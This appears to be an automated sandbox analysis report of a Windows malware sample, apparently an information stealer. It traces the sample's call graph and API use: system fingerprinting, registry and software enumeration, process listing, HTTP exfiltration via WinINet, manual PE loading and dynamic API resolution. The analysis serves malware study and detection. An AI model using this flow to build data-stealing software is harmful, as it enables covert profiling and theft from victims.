15085->15086 15087 cba8a0 lstrcpy 15086->15087 15088 cb1acc 15087->15088 15089 cba9b0 4 API calls 15088->15089 15090 cb1ae7 15089->15090 15091 cba8a0 lstrcpy 15090->15091 15092 cb1af0 15091->15092 15093 cba9b0 4 API calls 15092->15093 15094 cb1b09 15093->15094 15095 cba8a0 lstrcpy 15094->15095 15096 cb1b12 15095->15096 15097 cba9b0 4 API calls 15096->15097 15098 cb1b2d 15097->15098 15099 cba8a0 lstrcpy 15098->15099 15100 cb1b36 15099->15100 15101 cba9b0 4 API calls 15100->15101 15102 cb1b4f 15101->15102 15103 cba8a0 lstrcpy 15102->15103 15104 cb1b58 15103->15104 15105 cba9b0 4 API calls 15104->15105 15106 cb1b76 15105->15106 15107 cba8a0 lstrcpy 15106->15107 15108 cb1b7f 15107->15108 15109 cb7500 6 API calls 15108->15109 15110 cb1b96 15109->15110 15111 cba920 3 API calls 15110->15111 15112 cb1ba9 15111->15112 15113 cba8a0 lstrcpy 15112->15113 15114 cb1bb2 15113->15114 15115 cba9b0 4 API calls 15114->15115 15116 cb1bdc 15115->15116 15117 cba8a0 lstrcpy 15116->15117 15118 cb1be5 15117->15118 15119 cba9b0 4 API calls 15118->15119 15120 cb1c05 15119->15120 15121 cba8a0 lstrcpy 15120->15121 15122 cb1c0e 15121->15122 15826 cb7690 GetProcessHeap RtlAllocateHeap 15122->15826 15125 cba9b0 4 API calls 15126 cb1c2e 15125->15126 15127 cba8a0 lstrcpy 15126->15127 15128 cb1c37 15127->15128 15129 cba9b0 4 API calls 15128->15129 15130 cb1c56 15129->15130 15131 cba8a0 lstrcpy 15130->15131 15132 cb1c5f 15131->15132 15133 cba9b0 4 API calls 15132->15133 15134 cb1c80 15133->15134 15135 cba8a0 lstrcpy 15134->15135 15136 cb1c89 15135->15136 15833 cb77c0 GetCurrentProcess IsWow64Process 15136->15833 15139 cba9b0 4 API calls 15140 cb1ca9 15139->15140 15141 cba8a0 lstrcpy 15140->15141 15142 cb1cb2 15141->15142 15143 cba9b0 4 API calls 15142->15143 15144 cb1cd1 15143->15144 15145 cba8a0 lstrcpy 15144->15145 15146 cb1cda 15145->15146 15147 cba9b0 4 API calls 15146->15147 15148 cb1cfb 15147->15148 15149 cba8a0 lstrcpy 15148->15149 15150 cb1d04 15149->15150 15151 cb7850 3 API calls 15150->15151 15152 cb1d14 15151->15152 15153 cba9b0 4 API calls 15152->15153 15154 cb1d24 15153->15154 15155 cba8a0 lstrcpy 15154->15155 15156 cb1d2d 15155->15156 15157 cba9b0 4 API calls 15156->15157 15158 cb1d4c 15157->15158 15159 cba8a0 lstrcpy 15158->15159 15160 cb1d55 15159->15160 15161 cba9b0 4 API calls 15160->15161 15162 cb1d75 15161->15162 15163 cba8a0 lstrcpy 15162->15163 15164 cb1d7e 15163->15164 15165 cb78e0 3 API calls 15164->15165 15166 cb1d8e 15165->15166 15167 cba9b0 4 API calls 15166->15167 15168 cb1d9e 15167->15168 15169 cba8a0 lstrcpy 15168->15169 15170 cb1da7 15169->15170 15171 cba9b0 4 API calls 15170->15171 15172 cb1dc6 15171->15172 15173 cba8a0 lstrcpy 15172->15173 15174 cb1dcf 15173->15174 15175 cba9b0 4 API calls 15174->15175 15176 cb1df0 15175->15176 15177 cba8a0 lstrcpy 15176->15177 15178 cb1df9 15177->15178 15835 cb7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15178->15835 15181 cba9b0 4 API calls 15182 cb1e19 15181->15182 15183 cba8a0 lstrcpy 15182->15183 15184 cb1e22 15183->15184 15185 cba9b0 4 API calls 15184->15185 15186 cb1e41 15185->15186 15187 cba8a0 lstrcpy 15186->15187 15188 cb1e4a 15187->15188 15189 cba9b0 4 API calls 15188->15189 15190 cb1e6b 15189->15190 15191 cba8a0 lstrcpy 15190->15191 15192 cb1e74 15191->15192 15837 cb7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15192->15837 15195 cba9b0 4 API calls 15196 cb1e94 15195->15196 15197 cba8a0 lstrcpy 15196->15197 15198 cb1e9d 15197->15198 15199 cba9b0 4 API calls 15198->15199 15200 cb1ebc 15199->15200 15201 cba8a0 lstrcpy 15200->15201 15202 cb1ec5 15201->15202 15203 cba9b0 4 API calls 15202->15203 15204 cb1ee5 15203->15204 15205 cba8a0 lstrcpy 15204->15205 15206 cb1eee 15205->15206 15840 cb7b00 GetUserDefaultLocaleName 15206->15840 15209 cba9b0 4 API calls 15210 cb1f0e 15209->15210 15211 cba8a0 lstrcpy 15210->15211 15212 cb1f17 15211->15212 15213 cba9b0 4 API calls 15212->15213 15214 cb1f36 15213->15214 15215 cba8a0 lstrcpy 15214->15215 15216 cb1f3f 15215->15216 15217 cba9b0 4 API calls 15216->15217 15218 cb1f60 15217->15218 15219 cba8a0 lstrcpy 15218->15219 15220 cb1f69 15219->15220 15844 cb7b90 15220->15844 15222 cb1f80 15223 cba920 3 API calls 15222->15223 15224 cb1f93 15223->15224 15225 cba8a0 lstrcpy 15224->15225 15226 cb1f9c 15225->15226 15227 cba9b0 4 API calls 15226->15227 15228 cb1fc6 15227->15228 15229 cba8a0 lstrcpy 15228->15229 15230 cb1fcf 15229->15230 15231 cba9b0 4 API calls 15230->15231 15232 cb1fef 15231->15232 15233 cba8a0 lstrcpy 15232->15233 15234 cb1ff8 15233->15234 15856 cb7d80 GetSystemPowerStatus 15234->15856 15237 cba9b0 4 API calls 15238 cb2018 15237->15238 15239 cba8a0 lstrcpy 15238->15239 15240 cb2021 15239->15240 15241 cba9b0 4 API calls 15240->15241 15242 cb2040 15241->15242 15243 cba8a0 lstrcpy 15242->15243 15244 cb2049 15243->15244 15245 cba9b0 4 API calls 15244->15245 15246 cb206a 15245->15246 15247 cba8a0 lstrcpy 15246->15247 15248 cb2073 15247->15248 15249 cb207e GetCurrentProcessId 15248->15249 15858 cb9470 OpenProcess 15249->15858 15252 cba920 3 API calls 15253 cb20a4 15252->15253 15254 cba8a0 lstrcpy 15253->15254 15255 cb20ad 15254->15255 15256 cba9b0 4 API calls 15255->15256 15257 cb20d7 15256->15257 15258 cba8a0 lstrcpy 15257->15258 15259 cb20e0 15258->15259 15260 cba9b0 4 API calls 15259->15260 15261 cb2100 15260->15261 15262 cba8a0 lstrcpy 15261->15262 15263 cb2109 15262->15263 15863 cb7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15263->15863 15266 cba9b0 4 API calls 15267 cb2129 15266->15267 15268 cba8a0 lstrcpy 15267->15268 15269 cb2132 15268->15269 15270 cba9b0 4 API calls 15269->15270 15271 cb2151 15270->15271 15272 cba8a0 lstrcpy 15271->15272 15273 cb215a 15272->15273 15274 cba9b0 4 API calls 15273->15274 15275 cb217b 15274->15275 15276 cba8a0 lstrcpy 15275->15276 15277 cb2184 15276->15277 15867 cb7f60 15277->15867 15280 cba9b0 4 API calls 15281 cb21a4 15280->15281 15282 cba8a0 lstrcpy 15281->15282 15283 cb21ad 15282->15283 15284 cba9b0 4 API calls 15283->15284 15285 cb21cc 15284->15285 15286 cba8a0 lstrcpy 15285->15286 15287 cb21d5 15286->15287 15288 cba9b0 4 API calls 15287->15288 15289 cb21f6 15288->15289 15290 cba8a0 lstrcpy 15289->15290 15291 cb21ff 15290->15291 15880 cb7ed0 GetSystemInfo wsprintfA 15291->15880 15294 cba9b0 4 API calls 15295 cb221f 15294->15295 15296 cba8a0 lstrcpy 15295->15296 15297 cb2228 15296->15297 15298 cba9b0 4 API calls 15297->15298 15299 cb2247 15298->15299 15300 cba8a0 lstrcpy 15299->15300 15301 cb2250 15300->15301 15302 cba9b0 4 API calls 15301->15302 15303 cb2270 15302->15303 15304 cba8a0 lstrcpy 15303->15304 15305 cb2279 15304->15305 15882 cb8100 GetProcessHeap RtlAllocateHeap 15305->15882 15308 cba9b0 4 API calls 15309 cb2299 15308->15309 15310 cba8a0 lstrcpy 15309->15310 15311 cb22a2 15310->15311 15312 cba9b0 4 API calls 15311->15312 15313 cb22c1 15312->15313 15314 cba8a0 lstrcpy 15313->15314 15315 cb22ca 15314->15315 15316 cba9b0 4 API calls 15315->15316 15317 cb22eb 15316->15317 15318 cba8a0 lstrcpy 15317->15318 15319 cb22f4 15318->15319 15888 cb87c0 15319->15888 15322 cba920 3 API calls 15323 cb231e 15322->15323 15324 cba8a0 lstrcpy 15323->15324 15325 cb2327 15324->15325 15326 cba9b0 4 API calls 15325->15326 15327 cb2351 15326->15327 15328 cba8a0 lstrcpy 15327->15328 15329 cb235a 15328->15329 15330 cba9b0 4 API calls 15329->15330 15331 cb237a 15330->15331 15332 cba8a0 lstrcpy 15331->15332 15333 cb2383 15332->15333 15334 cba9b0 4 API calls 15333->15334 15335 cb23a2 15334->15335 15336 cba8a0 lstrcpy 15335->15336 15337 cb23ab 15336->15337 15893 cb81f0 15337->15893 15339 cb23c2 15340 cba920 3 API calls 15339->15340 15341 cb23d5 15340->15341 15342 cba8a0 lstrcpy 15341->15342 15343 cb23de 15342->15343 15344 cba9b0 4 API calls 15343->15344 15345 cb240a 15344->15345 15346 cba8a0 lstrcpy 15345->15346 15347 cb2413 15346->15347 15348 cba9b0 4 API calls 15347->15348 15349 cb2432 15348->15349 15350 cba8a0 lstrcpy 15349->15350 15351 cb243b 15350->15351 15352 cba9b0 4 API calls 15351->15352 15353 cb245c 15352->15353 15354 cba8a0 lstrcpy 15353->15354 15355 cb2465 15354->15355 15356 cba9b0 4 API calls 15355->15356 15357 cb2484 15356->15357 15358 cba8a0 lstrcpy 15357->15358 15359 cb248d 15358->15359 15360 cba9b0 4 API calls 15359->15360 15361 cb24ae 15360->15361 15362 cba8a0 lstrcpy 15361->15362 15363 cb24b7 15362->15363 15901 cb8320 15363->15901 15365 cb24d3 15366 cba920 3 API calls 15365->15366 15367 cb24e6 15366->15367 15368 cba8a0 lstrcpy 15367->15368 15369 cb24ef 15368->15369 15370 cba9b0 4 API calls 15369->15370 15371 cb2519 15370->15371 15372 cba8a0 lstrcpy 15371->15372 15373 cb2522 15372->15373 15374 cba9b0 4 API calls 15373->15374 15375 cb2543 15374->15375 15376 cba8a0 lstrcpy 15375->15376 15377 cb254c 15376->15377 15378 cb8320 17 API calls 15377->15378 15379 cb2568 15378->15379 15380 cba920 3 API calls 15379->15380 15381 cb257b 15380->15381 15382 cba8a0 lstrcpy 15381->15382 15383 cb2584 15382->15383 15384 cba9b0 4 API calls 15383->15384 15385 cb25ae 15384->15385 15386 cba8a0 lstrcpy 15385->15386 15387 cb25b7 15386->15387 15388 cba9b0 4 API calls 15387->15388 15389 cb25d6 15388->15389 15390 cba8a0 lstrcpy 15389->15390 15391 cb25df 15390->15391 15392 cba9b0 4 API calls 15391->15392 15393 cb2600 15392->15393 15394 cba8a0 lstrcpy 15393->15394 15395 cb2609 15394->15395 15937 cb8680 15395->15937 15397 cb2620 15398 cba920 3 API calls 15397->15398 15399 cb2633 15398->15399 15400 cba8a0 lstrcpy 15399->15400 15401 cb263c 15400->15401 15402 cb265a lstrlen 15401->15402 15403 cb266a 15402->15403 15404 cba740 lstrcpy 15403->15404 15405 cb267c 15404->15405 15406 ca1590 lstrcpy 15405->15406 15407 cb268d 15406->15407 15947 cb5190 15407->15947 15409 cb2699 15409->13841 15411 cbaad0 15410->15411 15412 ca5009 InternetOpenUrlA 15411->15412 15413 ca5021 15412->15413 15414 ca502a InternetReadFile 15413->15414 15415 ca50a0 InternetCloseHandle InternetCloseHandle 15413->15415 15414->15413 15416 ca50ec 15415->15416 15416->13845 16132 ca98d0 15417->16132 15419 cb0759 15420 cb0a38 15419->15420 15421 cb077d 15419->15421 15422 ca1590 lstrcpy 15420->15422 15424 cb0799 StrCmpCA 15421->15424 15423 cb0a49 15422->15423 16308 cb0250 15423->16308 15426 cb0843 15424->15426 15427 cb07a8 15424->15427 15430 cb0865 StrCmpCA 15426->15430 15429 cba7a0 lstrcpy 15427->15429 15431 cb07c3 15429->15431 15432 cb0874 15430->15432 15469 cb096b 15430->15469 15433 ca1590 lstrcpy 15431->15433 15434 cba740 lstrcpy 15432->15434 15435 cb080c 15433->15435 15437 cb0881 15434->15437 15438 cba7a0 lstrcpy 15435->15438 15436 cb099c StrCmpCA 15439 cb09ab 15436->15439 15440 cb0a2d 15436->15440 15441 cba9b0 4 API calls 15437->15441 15442 cb0823 15438->15442 15444 ca1590 lstrcpy 15439->15444 15440->13849 15445 cb08ac 15441->15445 15443 cba7a0 lstrcpy 15442->15443 15446 cb083e 15443->15446 15447 cb09f4 15444->15447 15448 cba920 3 API calls 15445->15448 16135 cafb00 15446->16135 15450 cba7a0 lstrcpy 15447->15450 15451 cb08b3 15448->15451 15452 cb0a0d 15450->15452 15453 cba9b0 4 API calls 15451->15453 15454 cba7a0 lstrcpy 15452->15454 15455 cb08ba 15453->15455 15457 cb0a28 15454->15457 16251 cb0030 15457->16251 15469->15436 15791 cba7a0 lstrcpy 15790->15791 15792 ca1683 15791->15792 15793 cba7a0 lstrcpy 15792->15793 15794 ca1695 15793->15794 15795 cba7a0 lstrcpy 15794->15795 15796 ca16a7 15795->15796 15797 cba7a0 lstrcpy 15796->15797 15798 ca15a3 15797->15798 15798->14672 15800 ca47c6 15799->15800 15801 ca4838 lstrlen 15800->15801 15802 cbaad0 15801->15802 15803 ca4848 InternetCrackUrlA 15802->15803 15804 ca4867 15803->15804 15804->14749 15806 cba740 lstrcpy 15805->15806 15807 cb8b74 15806->15807 15808 cba740 lstrcpy 15807->15808 15809 cb8b82 GetSystemTime 15808->15809 15810 cb8b99 15809->15810 15811 cba7a0 lstrcpy 15810->15811 15812 cb8bfc 15811->15812 15812->14764 15814 cba931 15813->15814 15815 cba988 15814->15815 15817 cba968 lstrcpy lstrcat 15814->15817 15816 cba7a0 lstrcpy 15815->15816 15818 cba994 15816->15818 15817->15815 15818->14768 15820 ca4e13 HttpSendRequestA 15819->15820 15820->14883 15822 ca4eee 15821->15822 15823 ca9af9 LocalAlloc 15821->15823 15822->14770 15822->14773 15823->15822 15824 ca9b14 CryptStringToBinaryA 15823->15824 15824->15822 15825 ca9b39 LocalFree 15824->15825 15825->15822 15954 cb77a0 15826->15954 15829 cb76c6 RegOpenKeyExA 15830 cb76e7 RegQueryValueExA 15829->15830 15831 cb7704 RegCloseKey 15829->15831 15830->15831 15832 cb1c1e 15831->15832 15832->15125 15834 cb1c99 15833->15834 15834->15139 15836 cb1e09 15835->15836 15836->15181 15838 cb7a9a wsprintfA 15837->15838 15839 cb1e84 15837->15839 15838->15839 15839->15195 15841 cb7b4d 15840->15841 15842 cb1efe 15840->15842 15961 cb8d20 LocalAlloc CharToOemW 15841->15961 15842->15209 15845 cba740 lstrcpy 15844->15845 15846 cb7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15845->15846 15851 cb7c25 15846->15851 15847 cb7d18 15849 cb7d28 15847->15849 15850 cb7d1e LocalFree 15847->15850 15848 cb7c46 GetLocaleInfoA 15848->15851 15852 cba7a0 lstrcpy 15849->15852 15850->15849 15851->15847 15851->15848 15853 cba9b0 lstrcpy lstrlen lstrcpy lstrcat 15851->15853 15855 cba8a0 lstrcpy 15851->15855 15854 cb7d37 15852->15854 15853->15851 15854->15222 15855->15851 15857 cb2008 15856->15857 15857->15237 15859 cb9493 GetModuleFileNameExA CloseHandle 15858->15859 15860 cb94b5 15858->15860 15859->15860 15861 cba740 lstrcpy 15860->15861 15862 cb2091 15861->15862 15862->15252 15864 cb7e68 RegQueryValueExA 15863->15864 15865 cb2119 15863->15865 15866 cb7e8e RegCloseKey 15864->15866 15865->15266 15866->15865 15868 cb7fb9 GetLogicalProcessorInformationEx 15867->15868 15869 cb7fd8 GetLastError 15868->15869 15871 cb8029 15868->15871 15870 cb8022 15869->15870 15878 cb7fe3 15869->15878 15872 cb2194 15870->15872 15875 cb89f0 2 API calls 15870->15875 15876 cb89f0 2 API calls 15871->15876 15872->15280 15875->15872 15877 cb807b 15876->15877 15877->15870 15879 cb8084 wsprintfA 15877->15879 15878->15868 15878->15872 15962 cb89f0 15878->15962 15965 cb8a10 GetProcessHeap RtlAllocateHeap 15878->15965 15879->15872 15881 cb220f 15880->15881 15881->15294 15883 cb89b0 15882->15883 15884 cb814d GlobalMemoryStatusEx 15883->15884 15885 cb8163 __aulldiv 15884->15885 15886 cb819b wsprintfA 15885->15886 15887 cb2289 15886->15887 15887->15308 15889 cb87fb GetProcessHeap RtlAllocateHeap wsprintfA 15888->15889 15891 cba740 lstrcpy 15889->15891 15892 cb230b 15891->15892 15892->15322 15894 cba740 lstrcpy 15893->15894 15900 cb8229 15894->15900 15895 cb8263 15896 cba7a0 lstrcpy 15895->15896 15898 cb82dc 15896->15898 15897 cba9b0 lstrcpy lstrlen lstrcpy lstrcat 15897->15900 15898->15339 15899 cba8a0 lstrcpy 15899->15900 15900->15895 15900->15897 15900->15899 15902 cba740 lstrcpy 15901->15902 15903 cb835c RegOpenKeyExA 15902->15903 15904 cb83ae 15903->15904 15905 cb83d0 15903->15905 15906 cba7a0 lstrcpy 15904->15906 15907 cb83f8 RegEnumKeyExA 15905->15907 15908 cb8613 RegCloseKey 15905->15908 15917 cb83bd 15906->15917 15909 cb843f wsprintfA RegOpenKeyExA 15907->15909 15910 cb860e 15907->15910 15911 cba7a0 lstrcpy 15908->15911 15912 cb84c1 RegQueryValueExA 15909->15912 15913 cb8485 RegCloseKey RegCloseKey 15909->15913 15910->15908 15911->15917 15915 cb84fa lstrlen 15912->15915 15916 cb8601 RegCloseKey 15912->15916 15914 cba7a0 lstrcpy 15913->15914 15914->15917 15915->15916 15918 cb8510 15915->15918 15916->15910 15917->15365 15919 cba9b0 4 API calls 15918->15919 15920 cb8527 15919->15920 15921 cba8a0 lstrcpy 15920->15921 15922 cb8533 15921->15922 15923 cba9b0 4 API calls 15922->15923 15924 cb8557 15923->15924 15925 cba8a0 lstrcpy 15924->15925 15926 cb8563 15925->15926 15927 cb856e RegQueryValueExA 15926->15927 15927->15916 15928 cb85a3 15927->15928 15929 cba9b0 4 API calls 15928->15929 15930 cb85ba 15929->15930 15931 cba8a0 lstrcpy 15930->15931 15932 cb85c6 15931->15932 15933 cba9b0 4 API calls 15932->15933 15934 cb85ea 15933->15934 15935 cba8a0 lstrcpy 15934->15935 15936 cb85f6 15935->15936 15936->15916 15938 cba740 lstrcpy 15937->15938 15939 cb86bc CreateToolhelp32Snapshot Process32First 15938->15939 15940 cb86e8 Process32Next 15939->15940 15941 cb875d CloseHandle 15939->15941 15940->15941 15943 cb86fd 15940->15943 15942 cba7a0 lstrcpy 15941->15942 15944 cb8776 15942->15944 15943->15940 15945 cba9b0 lstrcpy lstrlen lstrcpy lstrcat 15943->15945 15946 cba8a0 lstrcpy 15943->15946 15944->15397 15945->15943 15946->15943 15948 cba7a0 lstrcpy 15947->15948 15949 cb51b5 15948->15949 15950 ca1590 lstrcpy 15949->15950 15951 cb51c6 15950->15951 15966 ca5100 15951->15966 15953 cb51cf 15953->15409 15957 cb7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15954->15957 15956 cb76b9 15956->15829 15956->15832 15958 cb7780 RegCloseKey 15957->15958 15959 cb7765 RegQueryValueExA 15957->15959 15960 cb7793 15958->15960 15959->15958 15960->15956 15961->15842 15963 cb89f9 GetProcessHeap HeapFree 15962->15963 15964 cb8a0c 15962->15964 15963->15964 15964->15878 15965->15878 15967 cba7a0 lstrcpy 15966->15967 15968 ca5119 15967->15968 15969 ca47b0 2 API calls 15968->15969 15970 ca5125 15969->15970 16126 cb8ea0 15970->16126 15972 ca5184 15973 ca5192 lstrlen 15972->15973 15974 ca51a5 15973->15974 15975 cb8ea0 4 API calls 15974->15975 15976 ca51b6 15975->15976 15977 cba740 lstrcpy 15976->15977 15978 ca51c9 15977->15978 15979 cba740 lstrcpy 15978->15979 15980 ca51d6 15979->15980 15981 cba740 lstrcpy 15980->15981 15982 ca51e3 15981->15982 15983 cba740 lstrcpy 15982->15983 15984 ca51f0 15983->15984 15985 cba740 lstrcpy 15984->15985 15986 ca51fd InternetOpenA StrCmpCA 15985->15986 15987 ca522f 15986->15987 15988 ca58c4 InternetCloseHandle 15987->15988 15989 cb8b60 3 API calls 15987->15989 15995 ca58d9 ctype 15988->15995 15990 ca524e 15989->15990 15991 cba920 3 API calls 15990->15991 15992 ca5261 15991->15992 15993 cba8a0 lstrcpy 15992->15993 15994 ca526a 15993->15994 15996 cba9b0 4 API calls 15994->15996 15999 cba7a0 lstrcpy 15995->15999 15997 ca52ab 15996->15997 15998 cba920 3 API calls 15997->15998 16000 ca52b2 15998->16000 16004 ca5913 15999->16004 16001 cba9b0 4 API calls 16000->16001 16002 ca52b9 16001->16002 16003 cba8a0 lstrcpy 16002->16003 16005 ca52c2 16003->16005 16004->15953 16006 cba9b0 4 API calls 16005->16006 16007 ca5303 16006->16007 16008 cba920 3 API calls 16007->16008 16009 ca530a 16008->16009 16010 cba8a0 lstrcpy 16009->16010 16011 ca5313 16010->16011 16012 ca5329 InternetConnectA 16011->16012 16012->15988 16013 ca5359 HttpOpenRequestA 16012->16013 16015 ca58b7 InternetCloseHandle 16013->16015 16016 ca53b7 16013->16016 16015->15988 16017 cba9b0 4 API calls 16016->16017 16018 ca53cb 16017->16018 16019 cba8a0 lstrcpy 16018->16019 16020 ca53d4 16019->16020 16021 cba920 3 API calls 16020->16021 16022 ca53f2 16021->16022 16023 cba8a0 lstrcpy 16022->16023 16024 ca53fb 16023->16024 16025 cba9b0 4 API calls 16024->16025 16026 ca541a 16025->16026 16027 cba8a0 lstrcpy 16026->16027 16028 ca5423 16027->16028 16029 cba9b0 4 API calls 16028->16029 16030 ca5444 16029->16030 16031 cba8a0 lstrcpy 16030->16031 16032 ca544d 16031->16032 16033 cba9b0 4 API calls 16032->16033 16034 ca546e 16033->16034 16035 cba8a0 lstrcpy 16034->16035 16127 cb8ead CryptBinaryToStringA 16126->16127 16131 cb8ea9 16126->16131 16128 cb8ece GetProcessHeap RtlAllocateHeap 16127->16128 16127->16131 16129 cb8ef4 ctype 16128->16129 16128->16131 16130 cb8f05 CryptBinaryToStringA 16129->16130 16130->16131 16131->15972 16374 ca9880 16132->16374 16134 ca98e1 16134->15419 16136 cba740 lstrcpy 16135->16136 16137 cafb16 16136->16137 16309 cba740 lstrcpy 16308->16309 16310 cb0266 16309->16310 16311 cb8de0 2 API calls 16310->16311 16312 cb027b 16311->16312 16313 cba920 3 API calls 16312->16313 16314 cb028b 16313->16314 16315 cba8a0 lstrcpy 16314->16315 16316 cb0294 16315->16316 16317 cba9b0 4 API calls 16316->16317 16375 ca988e 16374->16375 16378 ca6fb0 16375->16378 16377 ca98ad ctype 16377->16134 16381 ca6d40 16378->16381 16382 ca6d63 16381->16382 16396 ca6d59 16381->16396 16397 ca6530 16382->16397 16386 ca6dbe 16386->16396 16407 ca69b0 16386->16407 16388 ca6e2a 16389 ca6ee6 VirtualFree 16388->16389 16391 ca6ef7 16388->16391 16388->16396 16389->16391 16390 ca6f41 16394 cb89f0 2 API calls 16390->16394 16390->16396 16391->16390 16392 ca6f38 16391->16392 16393 ca6f26 FreeLibrary 16391->16393 16395 cb89f0 2 API calls 16392->16395 16393->16391 16394->16396 16395->16390 16396->16377 16398 ca6542 16397->16398 16400 ca6549 16398->16400 16417 cb8a10 GetProcessHeap RtlAllocateHeap 16398->16417 16400->16396 16401 ca6660 16400->16401 16406 ca668f VirtualAlloc 16401->16406 16403 ca6730 16404 ca6743 VirtualAlloc 16403->16404 16405 ca673c 16403->16405 16404->16405 16405->16386 16406->16403 16406->16405 16408 ca69c9 16407->16408 16413 ca69d5 16407->16413 16409 ca6a09 LoadLibraryA 16408->16409 16408->16413 16410 ca6a32 16409->16410 16409->16413 16416 ca6ae0 16410->16416 16418 cb8a10 GetProcessHeap RtlAllocateHeap 16410->16418 16412 ca6ba8 GetProcAddress 16412->16413 16412->16416 16413->16388 16414 cb89f0 2 API calls 16414->16416 16415 ca6a8b 16415->16413 16415->16414 16416->16412 16416->16413 16417->16400 16418->16415

                                        Executed Functions

                                        Function 00CB9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 660 cb9860-cb9874 call cb9750 663 cb987a-cb9a8e call cb9780 GetProcAddress * 21 660->663 664 cb9a93-cb9af2 LoadLibraryA * 5 660->664 663->664 666 cb9b0d-cb9b14 664->666 667 cb9af4-cb9b08 GetProcAddress 664->667 669 cb9b46-cb9b4d 666->669 670 cb9b16-cb9b41 GetProcAddress * 2 666->670 667->666 671 cb9b68-cb9b6f 669->671 672 cb9b4f-cb9b63 GetProcAddress 669->672 670->669 673 cb9b89-cb9b90 671->673 674 cb9b71-cb9b84 GetProcAddress 671->674 672->671 675 cb9b92-cb9bbc GetProcAddress * 2 673->675 676 cb9bc1-cb9bc2 673->676 674->673 675->676
                                        APIs
                                        • GetProcAddress.KERNEL32(77190000,009D1738), ref: 00CB98A1
                                        • GetProcAddress.KERNEL32(77190000,009D1768), ref: 00CB98BA
                                        • GetProcAddress.KERNEL32(77190000,009D1678), ref: 00CB98D2
                                        • GetProcAddress.KERNEL32(77190000,009D1618), ref: 00CB98EA
                                        • GetProcAddress.KERNEL32(77190000,009D1510), ref: 00CB9903
                                        • GetProcAddress.KERNEL32(77190000,009D8B48), ref: 00CB991B
                                        • GetProcAddress.KERNEL32(77190000,009C55E8), ref: 00CB9933
                                        • GetProcAddress.KERNEL32(77190000,009C5408), ref: 00CB994C
                                        • GetProcAddress.KERNEL32(77190000,009D16F0), ref: 00CB9964
                                        • GetProcAddress.KERNEL32(77190000,009D16D8), ref: 00CB997C
                                        • GetProcAddress.KERNEL32(77190000,009D15B8), ref: 00CB9995
                                        • GetProcAddress.KERNEL32(77190000,009D1690), ref: 00CB99AD
                                        • GetProcAddress.KERNEL32(77190000,009C5448), ref: 00CB99C5
                                        • GetProcAddress.KERNEL32(77190000,009D15A0), ref: 00CB99DE
                                        • GetProcAddress.KERNEL32(77190000,009D16A8), ref: 00CB99F6
                                        • GetProcAddress.KERNEL32(77190000,009C5568), ref: 00CB9A0E
                                        • GetProcAddress.KERNEL32(77190000,009D1750), ref: 00CB9A27
                                        • GetProcAddress.KERNEL32(77190000,009D1780), ref: 00CB9A3F
                                        • GetProcAddress.KERNEL32(77190000,009C55A8), ref: 00CB9A57
                                        • GetProcAddress.KERNEL32(77190000,009D15D0), ref: 00CB9A70
                                        • GetProcAddress.KERNEL32(77190000,009C5688), ref: 00CB9A88
                                        • LoadLibraryA.KERNEL32(009D15E8,?,00CB6A00), ref: 00CB9A9A
                                        • LoadLibraryA.KERNEL32(009D1540,?,00CB6A00), ref: 00CB9AAB
                                        • LoadLibraryA.KERNEL32(009D1558,?,00CB6A00), ref: 00CB9ABD
                                        • LoadLibraryA.KERNEL32(009D1570,?,00CB6A00), ref: 00CB9ACF
                                        • LoadLibraryA.KERNEL32(009D17B0,?,00CB6A00), ref: 00CB9AE0
                                        • GetProcAddress.KERNEL32(76850000,009D1798), ref: 00CB9B02
                                        • GetProcAddress.KERNEL32(77040000,009D1600), ref: 00CB9B23
                                        • GetProcAddress.KERNEL32(77040000,009D1630), ref: 00CB9B3B
                                        • GetProcAddress.KERNEL32(75A10000,009D9068), ref: 00CB9B5D
                                        • GetProcAddress.KERNEL32(75690000,009C5508), ref: 00CB9B7E
                                        • GetProcAddress.KERNEL32(776F0000,009D8B98), ref: 00CB9B9F
                                        • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00CB9BB6
                                        Strings
                                        • NtQueryInformationProcess, xrefs: 00CB9BAA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: NtQueryInformationProcess
                                        • API String ID: 2238633743-2781105232
                                        • Opcode ID: 554d998e0f6e434cf98f705a9dc91df3fab8c3b9636cdb303ff029e9fe94f950
